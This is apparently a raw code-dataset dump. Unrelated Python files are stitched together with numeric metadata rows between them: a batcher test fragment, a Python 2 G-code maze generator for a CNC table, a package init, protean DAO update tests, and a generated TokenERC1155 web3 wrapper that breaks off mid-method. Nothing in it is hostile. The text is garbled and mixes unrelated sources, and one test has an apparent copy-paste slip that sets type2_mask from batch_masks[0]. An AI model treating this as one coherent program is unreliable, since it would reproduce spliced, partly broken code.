print("type2", type2_batch)
print("type3", type3_batch)
i += 1
type1_samples = [[10, 11, 12], [10], [10, 11, 12, 13], [10, 11]]
type2_samples = [[20, 21, 22], [20], [20, 21, 22, 23], [20, 21]]
type3_samples = [3, 1, 4, 2]
sample_tuples = [type1_samples, type2_samples, type3_samples]
pad_types = [None, 0.89, 2] # Check robustness to invalid Pad values. Should RAISE errors
i = 0
for batch, batch_masks in batcher(sample_tuples, pad_types, batch_size=2):
type1_batch = batch[0]
type2_batch = batch[1]
type3_batch = batch[2]
type1_mask = batch_masks[0]
type2_mask = batch_masks[0]
print("type1", type1_batch)
print("type2", type2_batch)
print("type3", type3_batch)
i += 1
| 26.583333
| 90
| 0.65047
| 203
| 1,276
| 3.871921
| 0.211823
| 0.101781
| 0.030534
| 0.076336
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0
| 0.140214
| 0.195141
| 1,276
| 47
| 91
| 27.148936
| 0.625122
| 0.046238
| 0
| 0.909091
| 0
| 0
| 0.024691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.030303
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87f7245e551cd089fc5f81791ae868716886c416
| 2,740
|
py
|
Python
|
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
from __future__ import division
xmax = 635
ymax = 220
x = 8
y = 0
diff = 20
print "G21 (mm mode)"
print "G90 (absolute mode)"
print "F2000"
print "G1 X8"
print "G91 (relative mode)"
moves = [
[-3,0],
[0,2],
[-1,0],
[0,-2],
[-9,0],
[0,1],
[-1,0],
[0,-1],
[-5,0],
[0,1],
[-1,0],
[0,-1],
[-3,0],
[0,1],
[2,0],
[0,1],
[-4,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[1,0],
[0,-1],
[2,0],
[0,-1],
[1,0],
[0,1],
[1,0],
[0,-2],
[1,0],
[0,3],
[-4,0],
[0,3],
[1,0],
[0,-2],
[1,0],
[0,4],
[3,0],
[0,-2],
[2,0],
[0,-2],
[3,0],
[0,-1],
[-4,0],
[0,2],
[-2,0],
[0,2],
[-1,0],
[0,-3],
[2,0],
[0,-4],
[1,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,-1],
[-1,0],
[0,-1],
[7,0],
[0,3],
[-1,0],
[0,-2],
[-1,0],
[0,3],
[1,0],
[0,1],
[-2,0],
[0,1],
[3,0],
[0,-2],
[1,0],
[0,-2],
[1,0],
[0,1],
[2,0],
[0,1],
[-2,0],
[0,1],
[-1,0],
[0,2],
[-5,0],
[0,-3],
[1,0],
[0,-1],
[-1,0],
[0,-1],
[1,0],
[0,-1],
[-2,0],
[0,6],
[-2,0],
[0,-1],
[1,0],
[0,-1],
[-2,0],
[0,2],
[-2,0],
[0,1],
[1,0],
[0,1],
[-7,0],
[0,-1],
[1,0],
[0,-1],
[-5,0],
[0,2],
[-1,0],
[0,-3],
[-2,0],
[0,-1],
[3,0],
[0,1],
[3,0],
[0,-2],
[-1,0],
[0,1],
[-1,0],
[0,-1],
[-2,0],
[0,-4],
[2,0],
[0,-1],
[-3,0],
[0,1],
[-1,0],
[0,-1],
[-3,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,1],
[-1,0],
[0,1],
[1,0],
[0,1],
[-2,0],
[0,1],
[-1,0],
[0,-2],
[1,0],
[0,-1],
[-2,0],
[0,5],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,2],
[-1,0],
[0,-1],
[-1,0],
[0,1],
[-1,0],
[0,-1],
[-1,0],
[0,2],
[7,0],
[0,-2],
[2,0],
[0,1],
[-1,0],
[0,1],
[12,0],
[0,-1],
[-2,0],
[0,-1],
[3,0],
[0,2],
[1,0],
[0,-2],
[1,0],
[0,2],
[4,0],
[0,-1],
[-3,0],
[0,-1],
[4,0],
[0,2],
[1,0],
[0,-3],
[-1,0],
[0,-1],
[1,0],
[0,-1],
[1,0],
[0,5],
[1,0],
[0,-9],
[-1,0],
[0,1],
[-1,0],
[0,-2],
[2,0],
[0,-1],
]
#maze path
for move in moves:
print "G1 X"+str(-move[0]*diff)+"Y"+str(move[1]*diff)
#reverse it
newmoves = moves[::-1]
for move in newmoves:
print "G1 X"+str(move[0]*diff)+"Y"+str(-move[1]*diff)
| 11.659574
| 57
| 0.241971
| 475
| 2,740
| 1.387368
| 0.092632
| 0.306525
| 0.268589
| 0.206373
| 0.694992
| 0.694992
| 0.687405
| 0.660091
| 0.60698
| 0.60698
| 0
| 0.264473
| 0.401095
| 2,740
| 234
| 58
| 11.709402
| 0.137112
| 0.006934
| 0
| 0.890909
| 0
| 0
| 0.026161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004545
| null | null | 0.031818
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e210c89a14871ece813767a23287a9a824d75311
| 108
|
py
|
Python
|
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
from check_auto_deploy.foo import Foo
from check_auto_deploy.bar import Bar, Events
__version__ = '0.2.0'
| 18
| 45
| 0.796296
| 19
| 108
| 4.105263
| 0.578947
| 0.230769
| 0.333333
| 0.487179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.12963
| 108
| 5
| 46
| 21.6
| 0.797872
| 0
| 0
| 0
| 0
| 0
| 0.046296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
355ce29ea0e6b550e20a753d803db203bda8791f
| 7,248
|
py
|
Python
|
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from protean.exceptions import ObjectNotFoundError
from .elements import Person, PersonRepository, User
class TestDAOUpdateFunctionality:
@pytest.fixture(autouse=True)
def register_elements(self, test_domain):
test_domain.register(Person)
test_domain.register(PersonRepository, aggregate_cls=Person)
test_domain.register(User)
def test_update_an_existing_entity_in_the_repository(self, test_domain):
person = test_domain.repository_for(Person)._dao.create(
id=11344234, first_name="John", last_name="Doe", age=22
)
test_domain.repository_for(Person)._dao.update(person, age=10)
updated_person = test_domain.repository_for(Person)._dao.get(11344234)
assert updated_person is not None
assert updated_person.age == 10
def test_that_updating_a_deleted_aggregate_raises_object_not_found_error(
self, test_domain
):
"""Try to update a non-existing entry"""
person = test_domain.repository_for(Person)._dao.create(
id=11344234, first_name="Johnny", last_name="John"
)
test_domain.repository_for(Person)._dao.delete(person)
with pytest.raises(ObjectNotFoundError):
test_domain.repository_for(Person)._dao.update(person, {"age": 10})
def test_updating_record_with_dictionary_args(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(person, {"age": 10})
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
def test_updating_record_with_kwargs(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(person, age=10)
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
def test_updating_record_with_both_dictionary_args_and_kwargs(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(
person, {"first_name": "Stephen"}, age=10
)
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
assert u_person.first_name == "Stephen"
def test_updating_record_through_filter(self, test_domain):
"""Test that update by query updates only correct records"""
test_domain.repository_for(Person)._dao.create(
id=1, first_name="Athos", last_name="Musketeer", age=2
)
test_domain.repository_for(Person)._dao.create(
id=2, first_name="Porthos", last_name="Musketeer", age=3
)
test_domain.repository_for(Person)._dao.create(
id=3, first_name="Aramis", last_name="Musketeer", age=4
)
test_domain.repository_for(Person)._dao.create(
id=4, first_name="dArtagnan", last_name="Musketeer", age=5
)
# Perform update
updated_count = (
test_domain.repository_for(Person)
._dao.query.filter(age__gt=3)
.update(last_name="Fraud")
)
# Query and check if only the relevant records have been updated
assert updated_count == 2
u_person1 = test_domain.repository_for(Person)._dao.get(1)
u_person2 = test_domain.repository_for(Person)._dao.get(2)
u_person3 = test_domain.repository_for(Person)._dao.get(3)
u_person4 = test_domain.repository_for(Person)._dao.get(4)
assert u_person1.last_name == "Musketeer"
assert u_person2.last_name == "Musketeer"
assert u_person3.last_name == "Fraud"
assert u_person4.last_name == "Fraud"
def test_updating_multiple_records_through_filter_with_arg_value(self, test_domain):
"""Try updating all records satisfying filter in one step, passing a dict"""
test_domain.repository_for(Person)._dao.create(
id=1, first_name="Athos", last_name="Musketeer", age=2
)
test_domain.repository_for(Person)._dao.create(
id=2, first_name="Porthos", last_name="Musketeer", age=3
)
test_domain.repository_for(Person)._dao.create(
id=3, first_name="Aramis", last_name="Musketeer", age=4
)
test_domain.repository_for(Person)._dao.create(
id=4, first_name="dArtagnan", last_name="Musketeer", age=5
)
# Perform update
updated_count = (
test_domain.repository_for(Person)
._dao.query.filter(age__gt=3)
.update_all({"last_name": "Fraud"})
)
# Query and check if only the relevant records have been updated
assert updated_count == 2
u_person1 = test_domain.repository_for(Person)._dao.get(1)
u_person2 = test_domain.repository_for(Person)._dao.get(2)
u_person3 = test_domain.repository_for(Person)._dao.get(3)
u_person4 = test_domain.repository_for(Person)._dao.get(4)
assert u_person1.last_name == "Musketeer"
assert u_person2.last_name == "Musketeer"
assert u_person3.last_name == "Fraud"
assert u_person4.last_name == "Fraud"
def test_updating_multiple_records_through_filter_with_kwarg_value(
    self, test_domain
):
    """Try updating all records satisfying filter in one step"""
    dao = test_domain.repository_for(Person)._dao

    # Seed four musketeers with ascending ages.
    for identifier, name, age in [
        (1, "Athos", 2),
        (2, "Porthos", 3),
        (3, "Aramis", 4),
        (4, "dArtagnan", 5),
    ]:
        dao.create(id=identifier, first_name=name, last_name="Musketeer", age=age)

    # Perform update via `update_all` with a keyword argument
    updated_count = dao.query.filter(age__gt=3).update_all(last_name="Fraud")

    # Query and check if only the relevant records have been updated
    assert updated_count == 2
    expected_last_names = {1: "Musketeer", 2: "Musketeer", 3: "Fraud", 4: "Fraud"}
    for identifier, last_name in expected_last_names.items():
        assert dao.get(identifier).last_name == last_name
| 41.181818
| 88
| 0.660734
| 935
| 7,248
| 4.805348
| 0.119786
| 0.120187
| 0.186957
| 0.215001
| 0.84398
| 0.835299
| 0.824171
| 0.815936
| 0.801246
| 0.801246
| 0
| 0.021457
| 0.234823
| 7,248
| 175
| 89
| 41.417143
| 0.788677
| 0.080298
| 0
| 0.625
| 0
| 0
| 0.056453
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.066176
| false
| 0
| 0.022059
| 0
| 0.095588
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
358d8ddc061acaa3a2db0ab4b120817a11d0c14e
| 179,699
|
py
|
Python
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 30
|
2021-10-31T13:17:58.000Z
|
2022-02-04T13:41:13.000Z
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 36
|
2021-11-03T20:30:38.000Z
|
2022-02-14T10:15:40.000Z
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 10
|
2021-11-10T19:59:41.000Z
|
2022-01-21T21:26:55.000Z
|
"""Generated wrapper for TokenERC1155 Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from web3 import Web3
from web3.contract import ContractFunction
from web3.datastructures import AttributeDict
from web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for TokenERC1155 below.
try:
# both mypy and pylint complain about what we're doing here, but this
# works just fine, so their messages have been disabled here.
from . import ( # type: ignore # pylint: disable=import-self
TokenERC1155Validator,
)
except ImportError:
class TokenERC1155Validator(Validator): # type: ignore
"""No-op input validator."""
try:
from .middleware import MIDDLEWARE # type: ignore
except ImportError:
pass
class ITokenERC1155MintRequest(TypedDict):
    """Python representation of a tuple or struct.

    Solidity compiler output does not include the names of structs that appear
    in method definitions. A tuple found in an ABI may have been written in
    Solidity as a literal, anonymous tuple, or it may have been written as a
    named `struct`:code:, but there is no way to tell from the compiler
    output. This class represents a tuple that appeared in a method
    definition. Its name is derived from a hash of that tuple's field names,
    and every method whose ABI refers to a tuple with that same list of field
    names will have a generated wrapper method that refers to this class.

    Any members of type `bytes`:code: should be encoded as UTF-8, which can be
    accomplished via `str.encode("utf_8")`:code:
    """

    # recipient of the minted tokens
    to: str

    # address that receives royalty payments
    royaltyRecipient: str

    # royalty amount in basis points
    royaltyBps: int

    # address that receives primary-sale proceeds
    primarySaleRecipient: str

    # id of the ERC-1155 token to mint
    tokenId: int

    # metadata URI for the token
    uri: str

    # number of tokens to mint
    quantity: int

    # price per token, denominated in `currency`
    pricePerToken: int

    # ERC-20 currency address (or native-token sentinel)
    currency: str

    # earliest timestamp at which the request is valid
    validityStartTimestamp: int

    # latest timestamp at which the request is valid
    validityEndTimestamp: int

    # unique identifier preventing request replay
    uid: Union[bytes, str]
class DefaultAdminRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the DEFAULT_ADMIN_ROLE method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data.

        :param web3_or_provider: Web3 instance or raw provider to talk to
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction to delegate to
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generator emitted ``Union[bytes, str](returned)``,
        # but ``typing.Union`` is not instantiable and raises TypeError at
        # runtime.  HexBytes is a bytes subclass, so it satisfies the
        # declared ``Union[bytes, str]`` return type.
        return HexBytes(returned)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class BalanceOfMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the balanceOf method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str, _id: int):
        """Validate the inputs to the balanceOf method.

        :param account: address whose balance is queried
        :param _id: token id (leading underscore avoids shadowing builtin `id`)
        :returns: the (checksummed, int-coerced) input pair
        """
        self.validator.assert_valid(
            method_name="balanceOf",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="balanceOf",
            parameter_name="id",
            argument_value=_id,
        )
        # safeguard against fractional inputs
        _id = int(_id)
        return (account, _id)

    def call(
        self, account: str, _id: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (account, _id) = self.validate_and_normalize_inputs(account, _id)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(account, _id).call(
            tx_params.as_dict()
        )
        return int(returned)

    def send_transaction(
        self, account: str, _id: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (account, _id) = self.validate_and_normalize_inputs(account, _id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self, account: str, _id: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (account, _id) = self.validate_and_normalize_inputs(account, _id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, account: str, _id: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (account, _id) = self.validate_and_normalize_inputs(account, _id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id).estimateGas(
            tx_params.as_dict()
        )
class BalanceOfBatchMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the balanceOfBatch method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, accounts: List[str], ids: List[int]
    ):
        """Validate the inputs to the balanceOfBatch method.

        :param accounts: addresses to query, paired index-wise with `ids`
        :param ids: token ids to query
        """
        self.validator.assert_valid(
            method_name="balanceOfBatch",
            parameter_name="accounts",
            argument_value=accounts,
        )
        self.validator.assert_valid(
            method_name="balanceOfBatch",
            parameter_name="ids",
            argument_value=ids,
        )
        return (accounts, ids)

    def call(
        self,
        accounts: List[str],
        ids: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> List[int]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(accounts, ids).call(
            tx_params.as_dict()
        )
        # coerce each returned balance to a plain int
        return [int(element) for element in returned]

    def send_transaction(
        self,
        accounts: List[str],
        ids: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(accounts, ids).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        accounts: List[str],
        ids: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(accounts, ids).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        accounts: List[str],
        ids: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(accounts, ids).estimateGas(
            tx_params.as_dict()
        )
class BurnMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the burn method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, account: str, _id: int, value: int
    ):
        """Validate the inputs to the burn method.

        :param account: address whose tokens are burned
        :param _id: token id (leading underscore avoids shadowing builtin `id`)
        :param value: amount of tokens to burn
        """
        self.validator.assert_valid(
            method_name="burn",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="burn",
            parameter_name="id",
            argument_value=_id,
        )
        # safeguard against fractional inputs
        _id = int(_id)
        self.validator.assert_valid(
            method_name="burn",
            parameter_name="value",
            argument_value=value,
        )
        # safeguard against fractional inputs
        value = int(value)
        return (account, _id, value)

    def call(
        self,
        account: str,
        _id: int,
        value: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (account, _id, value) = self.validate_and_normalize_inputs(
            account, _id, value
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(account, _id, value).call(tx_params.as_dict())

    def send_transaction(
        self,
        account: str,
        _id: int,
        value: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (account, _id, value) = self.validate_and_normalize_inputs(
            account, _id, value
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id, value).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        account: str,
        _id: int,
        value: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (account, _id, value) = self.validate_and_normalize_inputs(
            account, _id, value
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id, value).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        account: str,
        _id: int,
        value: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (account, _id, value) = self.validate_and_normalize_inputs(
            account, _id, value
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, _id, value).estimateGas(
            tx_params.as_dict()
        )
class BurnBatchMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the burnBatch method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, account: str, ids: List[int], values: List[int]
    ):
        """Validate the inputs to the burnBatch method.

        :param account: address whose tokens are burned
        :param ids: token ids, paired index-wise with `values`
        :param values: amounts to burn per token id
        """
        self.validator.assert_valid(
            method_name="burnBatch",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="burnBatch",
            parameter_name="ids",
            argument_value=ids,
        )
        self.validator.assert_valid(
            method_name="burnBatch",
            parameter_name="values",
            argument_value=values,
        )
        return (account, ids, values)

    def call(
        self,
        account: str,
        ids: List[int],
        values: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (account, ids, values) = self.validate_and_normalize_inputs(
            account, ids, values
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(account, ids, values).call(tx_params.as_dict())

    def send_transaction(
        self,
        account: str,
        ids: List[int],
        values: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (account, ids, values) = self.validate_and_normalize_inputs(
            account, ids, values
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, ids, values).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        account: str,
        ids: List[int],
        values: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (account, ids, values) = self.validate_and_normalize_inputs(
            account, ids, values
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, ids, values).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        account: str,
        ids: List[int],
        values: List[int],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (account, ids, values) = self.validate_and_normalize_inputs(
            account, ids, values
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, ids, values).estimateGas(
            tx_params.as_dict()
        )
class ContractTypeMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractType method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data.

        :param web3_or_provider: Web3 instance or raw provider to talk to
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction to delegate to
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generator emitted ``Union[bytes, str](returned)``,
        # but ``typing.Union`` is not instantiable and raises TypeError at
        # runtime.  HexBytes is a bytes subclass, so it satisfies the
        # declared ``Union[bytes, str]`` return type.
        return HexBytes(returned)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractURI method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = super().normalize_tx_params(tx_params)
